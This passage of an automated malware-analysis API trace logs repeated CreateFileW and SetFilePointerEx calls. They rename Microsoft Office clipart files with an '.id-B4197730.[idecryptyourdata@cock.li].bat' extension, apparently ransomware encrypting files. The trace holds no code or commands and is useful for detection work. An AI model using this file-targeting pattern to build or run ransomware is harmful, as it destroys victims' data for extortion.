liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0162.608] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0162.609] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145707.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145707.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.609] CloseHandle (hObject=0x510) returned 1 [0162.610] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0162.611] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0162.611] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145810.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145810.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.611] CloseHandle (hObject=0x510) returned 1 [0162.613] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0162.613] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0162.613] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145879.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145879.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.614] CloseHandle (hObject=0x510) returned 1 [0162.616] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0162.616] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0162.616] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145895.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145895.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.617] CloseHandle (hObject=0x510) returned 1 [0162.618] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0162.618] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0162.618] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145904.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145904.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.619] CloseHandle (hObject=0x510) returned 1 [0162.620] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0162.620] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0162.620] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0146142.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0146142.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.621] CloseHandle (hObject=0x510) returned 1 [0162.623] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0162.623] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0162.623] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0148309.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0148309.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.625] CloseHandle (hObject=0x510) returned 1 [0162.626] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0162.626] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0162.627] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0148757.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0148757.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.627] CloseHandle (hObject=0x510) returned 1 [0162.627] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0162.628] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0162.628] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0148798.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0148798.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.628] CloseHandle (hObject=0x510) returned 1 [0162.629] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0162.630] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0162.630] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0149018.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0149018.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.630] CloseHandle (hObject=0x510) returned 1 [0162.631] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0162.631] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0162.632] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0149118.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0149118.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.632] CloseHandle (hObject=0x510) returned 1 [0162.634] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0162.634] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0162.634] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0150150.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0150150.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.634] CloseHandle (hObject=0x510) returned 1 [0162.635] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0162.635] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0162.636] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0150861.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0150861.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.636] CloseHandle (hObject=0x510) returned 1 [0162.964] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0162.964] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0162.964] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151041.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151041.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.964] CloseHandle (hObject=0x510) returned 1 [0162.966] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0162.966] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0162.966] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152882.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152882.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.966] CloseHandle (hObject=0x510) returned 1 [0162.968] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0162.968] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0162.968] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152884.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152884.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.968] CloseHandle (hObject=0x510) returned 1 [0162.969] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0162.969] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0162.969] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152890.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152890.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.969] CloseHandle (hObject=0x510) returned 1 [0162.971] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0162.971] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0162.971] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152892.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152892.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.971] CloseHandle (hObject=0x510) returned 1 [0162.972] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0162.972] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0162.972] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152894.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152894.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.972] CloseHandle (hObject=0x510) returned 1 [0162.974] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0162.974] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0162.974] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152898.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152898.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.974] CloseHandle (hObject=0x510) returned 1 [0162.975] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0162.975] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0162.975] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153047.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153047.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.975] CloseHandle (hObject=0x510) returned 1 [0162.977] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0162.977] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0162.977] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153087.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153087.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.977] CloseHandle (hObject=0x510) returned 1 [0162.978] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0162.978] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0162.978] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153089.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153089.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.978] CloseHandle (hObject=0x510) returned 1 [0162.979] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0162.979] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0162.979] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153091.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153091.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.979] CloseHandle (hObject=0x510) returned 1 [0162.980] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0162.980] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0162.980] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153093.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153093.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.981] CloseHandle (hObject=0x510) returned 1 [0162.982] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0162.982] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0162.982] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153095.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153095.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.982] CloseHandle (hObject=0x510) returned 1 [0162.984] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0162.984] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0162.984] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153265.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153265.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.984] CloseHandle (hObject=0x510) returned 1 [0162.985] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0162.985] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0162.985] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153273.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153273.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.985] CloseHandle (hObject=0x510) returned 1 [0162.986] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0162.986] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0162.986] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153299.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153299.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.987] CloseHandle (hObject=0x510) returned 1 [0162.987] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0162.987] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0162.987] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153302.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153302.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.988] CloseHandle (hObject=0x510) returned 1 [0162.988] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0162.988] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0162.988] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153305.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153305.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.989] CloseHandle (hObject=0x510) returned 1 [0162.989] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0162.989] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0162.989] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153307.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153307.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.989] CloseHandle (hObject=0x510) returned 1 [0162.990] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0162.990] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, 